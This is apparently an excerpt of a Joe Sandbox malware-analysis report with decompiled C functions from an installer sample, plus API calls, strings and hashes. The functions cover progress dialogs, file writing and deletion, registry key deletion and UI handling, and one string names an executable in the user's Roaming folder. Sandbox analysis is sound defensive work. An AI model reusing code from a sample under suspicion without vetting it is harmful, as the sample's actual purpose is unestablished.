                            				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                            				if((_v12 & 0x00000066) != 0) {
                            					_t15 = _v8;
                            					goto L4;
                            				}
                            				return _t25 | 0xffffffff;
                            			}














                            Per-line instruction addresses for the listing above (column alignment lost in extraction): 0x00404e62 to 0x00404ecb.

                            APIs
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                            • GetMessagePos.USER32 ref: 00404E77
                            • ScreenToClient.USER32 ref: 00404E91
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Message$Send$ClientScreen
                            • String ID: f
                            • API String ID: 41195575-1993550816
                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                            • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                            • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                            				short _v132;
                            				int _t11;
                            				int _t20;
                            
                            				if(_a8 == 0x110) {
                            					SetTimer(_a4, 1, 0xfa, 0);
                            					_a8 = 0x113;
                            				}
                            				if(_a8 == 0x113) {
                            					_t20 =  *0x41ea18; // 0x47ed1b
                            					_t11 =  *0x42aa24; // 0x47ed1f
                            					if(_t20 >= _t11) {
                            						_t20 = _t11;
                            					}
                            					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                            					SetWindowTextW(_a4,  &_v132);
                            					SetDlgItemTextW(_a4, 0x406,  &_v132);
                            				}
                            				return 0;
                            			}






                            Per-line instruction addresses for the listing above (column alignment lost in extraction): 0x00402fa3 to 0x00403016.

                            APIs
                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                            • MulDiv.KERNEL32(0047ED1B,00000064,0047ED1F), ref: 00402FDC
                            • wsprintfW.USER32 ref: 00402FEC
                            • SetWindowTextW.USER32(?,?), ref: 00402FFC
                            • SetDlgItemTextW.USER32 ref: 0040300E
                            Strings
                            • verifying installer: %d%%, xrefs: 00402FE6
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Text$ItemTimerWindowwsprintf
                            • String ID: verifying installer: %d%%
                            • API String ID: 1451636040-82062127
                            • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                            • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                            • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                            • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 86%
                            			E00402950(int __ebx) {
                            				WCHAR* _t26;
                            				void* _t29;
                            				long _t37;
                            				int _t49;
                            				void* _t52;
                            				void* _t54;
                            				void* _t56;
                            				void* _t59;
                            				void* _t60;
                            				void* _t61;
                            
                            				_t49 = __ebx;
                            				_t52 = 0xfffffd66;
                            				_t26 = E00402DA6(0xfffffff0);
                            				_t55 = _t26;
                            				 *(_t61 - 0x40) = _t26;
                            				if(E00405E83(_t26) == 0) {
                            					E00402DA6(0xffffffed);
                            				}
                            				E00406008(_t55);
                            				_t29 = E0040602D(_t55, 0x40000000, 2);
                            				 *(_t61 + 8) = _t29;
                            				if(_t29 != 0xffffffff) {
                            					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                            					if( *(_t61 - 0x28) != _t49) {
                            						_t37 =  *0x434f14;
                            						 *(_t61 - 0x44) = _t37;
                            						_t54 = GlobalAlloc(0x40, _t37);
                            						if(_t54 != _t49) {
                            							E004034E5(_t49);
                            							E004034CF(_t54,  *(_t61 - 0x44));
                            							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                            							 *(_t61 - 0x10) = _t59;
                            							if(_t59 != _t49) {
                            								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                            								while( *_t59 != _t49) {
                            									_t60 = _t59 + 8;
                            									 *(_t61 - 0x3c) =  *_t59;
                            									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                            									_t59 = _t60 +  *(_t61 - 0x3c);
                            								}
                            								GlobalFree( *(_t61 - 0x10));
                            							}
                            							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                            							GlobalFree(_t54);
                            							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                            						}
                            					}
                            					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                            					CloseHandle( *(_t61 + 8));
                            				}
                            				_t56 = 0xfffffff3;
                            				if(_t52 < _t49) {
                            					_t56 = 0xffffffef;
                            					DeleteFileW( *(_t61 - 0x40));
                            					 *((intOrPtr*)(_t61 - 4)) = 1;
                            				}
                            				_push(_t56);
                            				E00401423();
                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
                            				return 0;
                            			}

                            APIs
                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                            • GlobalFree.KERNEL32 ref: 00402A06
                            • GlobalFree.KERNEL32 ref: 00402A19
                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                            • String ID:
                            • API String ID: 2667972263-0
                            • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                            • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                            • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                            • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00405A6E(WCHAR* _a4) {
                            				struct _SECURITY_ATTRIBUTES _v16;
                            				struct _SECURITY_DESCRIPTOR _v36;
                            				long _t23;
                            
                            				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                            				_v36.Owner = 0x4083f8;
                            				_v36.Group = 0x4083f8;
                            				_v36.Sacl = _v36.Sacl & 0x00000000;
                            				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                            				_v16.lpSecurityDescriptor =  &_v36;
                            				_v36.Revision = 1;
                            				_v36.Control = 4;
                            				_v36.Dacl = 0x4083e8;
                            				_v16.nLength = 0xc;
                            				if(CreateDirectoryW(_a4,  &_v16) != 0) {
                            					L1:
                            					return 0;
                            				}
                            				_t23 = GetLastError();
                            				if(_t23 == 0xb7) {
                            					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                            						goto L1;
                            					}
                            					return GetLastError();
                            				}
                            				return _t23;
                            			}

                            APIs
                            • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                            • GetLastError.KERNEL32 ref: 00405AC5
                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                            • GetLastError.KERNEL32 ref: 00405AE4
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                            • String ID: C:\Users\user\AppData\Local\Temp\
                            • API String ID: 3449924974-3081826266
                            • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                            • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                            • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                            • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 48%
                            			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                            				void* _v8;
                            				int _v12;
                            				short _v536;
                            				void* _t27;
                            				signed int _t33;
                            				intOrPtr* _t35;
                            				signed int _t45;
                            				signed int _t46;
                            				signed int _t47;
                            
                            				_t46 = _a12;
                            				_t47 = _t46 & 0x00000300;
                            				_t45 = _t46 & 0x00000001;
                            				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                            				if(_t27 == 0) {
                            					if((_a12 & 0x00000002) == 0) {
                            						L3:
                            						_push(0x105);
                            						_push( &_v536);
                            						_push(0);
                            						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                            							__eflags = _t45;
                            							if(__eflags != 0) {
                            								L10:
                            								RegCloseKey(_v8);
                            								return 0x3eb;
                            							}
                            							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                            							__eflags = _t33;
                            							if(_t33 != 0) {
                            								break;
                            							}
                            							_push(0x105);
                            							_push( &_v536);
                            							_push(_t45);
                            						}
                            						RegCloseKey(_v8);
                            						_t35 = E0040690A(3);
                            						if(_t35 != 0) {
                            							return  *_t35(_a4, _a8, _t47, 0);
                            						}
                            						return RegDeleteKeyW(_a4, _a8);
                            					}
                            					_v12 = 0;
                            					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                            						goto L10;
                            					}
                            					goto L3;
                            				}
                            				return _t27;
                            			}

                            APIs
                            • RegEnumValueW.ADVAPI32 ref: 00402EFD
                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CloseEnum$DeleteValue
                            • String ID:
                            • API String ID: 1354259210-0
                            • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                            • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                            • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                            • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 77%
                            			E00401D81(void* __ebx, void* __edx) {
                            				struct HWND__* _t30;
                            				WCHAR* _t38;
                            				void* _t48;
                            				void* _t53;
                            				signed int _t55;
                            				signed int _t60;
                            				long _t63;
                            				void* _t65;
                            
                            				_t53 = __ebx;
                            				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                            					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                            				} else {
                            					E00402D84(2);
                            					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                            				}
                            				_t55 =  *(_t65 - 0x24);
                            				 *(_t65 + 8) = _t30;
                            				_t60 = _t55 & 0x00000004;
                            				 *(_t65 - 0x38) = _t55 & 0x00000003;
                            				 *(_t65 - 0x18) = _t55 >> 0x1f;
                            				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                            				if((_t55 & 0x00010000) == 0) {
                            					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                            				} else {
                            					_t38 = E00402DA6(0x11);
                            				}
                            				 *(_t65 - 0x44) = _t38;
                            				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                            				asm("sbb esi, esi");
                            				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                            				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                            				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                            					DeleteObject(_t48);
                            				}
                            				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                            					_push(_t63);
                            					E00406484();
                            				}
                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
                            				return 0;
                            			}

                            APIs
                            • GetDlgItem.USER32 ref: 00401D9A
                            • GetClientRect.USER32(?,?), ref: 00401DE5
                            • LoadImageW.USER32 ref: 00401E15
                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                            • DeleteObject.GDI32(00000000), ref: 00401E39
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                            • String ID:
                            • API String ID: 1849352358-0
                            • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                            • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                            • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                            • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E00401E4E(intOrPtr __edx) {
                            				void* __edi;
                            				int _t9;
                            				signed char _t15;
                            				struct HFONT__* _t18;
                            				intOrPtr _t30;
                            				void* _t31;
                            				struct HDC__* _t33;
                            				void* _t35;
                            
                            				_t30 = __edx;
                            				_t33 = GetDC( *(_t35 - 8));
                            				_t9 = E00402D84(2);
                            				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                            				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                            				ReleaseDC( *(_t35 - 8), _t33);
                            				 *0x40ce00 = E00402D84(3);
                            				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                            				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                            				 *0x40ce07 = 1;
                            				 *0x40ce04 = _t15 & 0x00000001;
                            				 *0x40ce05 = _t15 & 0x00000002;
                            				 *0x40ce06 = _t15 & 0x00000004;
                            				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
                            				_t18 = CreateFontIndirectW(0x40cdf0);
                            				_push(_t18);
                            				_push(_t31);
                            				E00406484();
                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                            				return 0;
                            			}

                            APIs
                            • GetDC.USER32(?), ref: 00401E51
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                            • ReleaseDC.USER32 ref: 00401E84
                              • Part of subcall function 0040657A: lstrcatW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                              • Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                            • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                            • String ID:
                            • API String ID: 2584051700-0
                            • Opcode ID: 0465d2832808ea9d6fff4b9245e4cab849096788d5b9b76ed02900a81bf07427
                            • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                            • Opcode Fuzzy Hash: 0465d2832808ea9d6fff4b9245e4cab849096788d5b9b76ed02900a81bf07427
                            • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 59%
                            			E00401C43(intOrPtr __edx) {
                            				int _t29;
                            				long _t30;
                            				signed int _t32;
                            				WCHAR* _t35;
                            				long _t36;
                            				int _t41;
                            				signed int _t42;
                            				int _t46;
                            				int _t56;
                            				intOrPtr _t57;
                            				struct HWND__* _t63;
                            				void* _t64;
                            
                            				_t57 = __edx;
                            				_t29 = E00402D84(3);
                            				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                            				 *(_t64 - 0x18) = _t29;
                            				_t30 = E00402D84(4);
                            				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                            				 *(_t64 + 8) = _t30;
                            				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                            					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                            				}
                            				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                            				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                            					 *(_t64 + 8) = E00402DA6(0x44);
                            				}
                            				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                            				_push(1);
                            				if(__eflags != 0) {
                            					_t61 = E00402DA6();
                            					_t32 = E00402DA6();
                            					asm("sbb ecx, ecx");
                            					asm("sbb eax, eax");
                            					_t35 =  ~( *_t31) & _t61;
                            					__eflags = _t35;
                            					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                            					goto L10;
                            				} else {
                            					_t63 = E00402D84();
                            					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                            					_t41 = E00402D84(2);
                            					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                            					_t56 =  *(_t64 - 0x1c) >> 2;
                            					if(__eflags == 0) {
                            						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                            						L10:
                            						 *(_t64 - 0x38) = _t36;
                            					} else {
                            						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                            						asm("sbb eax, eax");
                            						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                            					}
                            				}
                            				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                            				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                            					_push( *(_t64 - 0x38));
                            					E00406484();
                            				}
                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                            				return 0;
                            			}
                            Instruction addresses: 0x00401c43 0x00401c45 0x00401c4c 0x00401c4f 0x00401c52 0x00401c5c 0x00401c60 0x00401c63 0x00401c6c 0x00401c6c 0x00401c6f 0x00401c73 0x00401c7c 0x00401c7c 0x00401c7f 0x00401c83 0x00401c85 0x00401cda 0x00401cdc 0x00401ce7 0x00401cf1 0x00401cf4 0x00401cf4 0x00401cfd 0x00000000 0x00401c87 0x00401c8e 0x00401c90 0x00401c93 0x00401c99 0x00401ca0 0x00401ca3 0x00401ccb 0x00401d03 0x00401d03 0x00401ca5 0x00401cb3 0x00401cbb 0x00401cbe 0x00401cbe 0x00401ca3 0x00401d06 0x00401d09 0x00401d0f 0x00402ba4 0x00402ba4 0x00402c2d 0x00402c39

                            APIs
                            • SendMessageTimeoutW.USER32 ref: 00401CB3
                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: MessageSend$Timeout
                            • String ID: !
                            • API String ID: 1777923405-2657877971
                            • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                            • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                            • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                            • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 77%
                            			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                            				char _v68;
                            				char _v132;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t23;
                            				signed int _t24;
                            				void* _t31;
                            				void* _t33;
                            				void* _t34;
                            				void* _t44;
                            				signed int _t46;
                            				signed int _t50;
                            				signed int _t52;
                            				signed int _t53;
                            				signed int _t55;
                            
                            				_t23 = _a16;
                            				_t53 = _a12;
                            				_t44 = 0xffffffdc;
                            				if(_t23 == 0) {
                            					_push(0x14);
                            					_pop(0);
                            					_t24 = _t53;
                            					if(_t53 < 0x100000) {
                            						_push(0xa);
                            						_pop(0);
                            						_t44 = 0xffffffdd;
                            					}
                            					if(_t53 < 0x400) {
                            						_t44 = 0xffffffde;
                            					}
                            					if(_t53 < 0xffff3333) {
                            						_t52 = 0x14;
                            						asm("cdq");
                            						_t24 = 1 / _t52 + _t53;
                            					}
                            					_t25 = _t24 & 0x00ffffff;
                            					_t55 = _t24 >> 0;
                            					_t46 = 0xa;
                            					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                            				} else {
                            					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                            					_t50 = 0;
                            				}
                            				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                            				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
                            				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
                            				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                            				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
                            			}
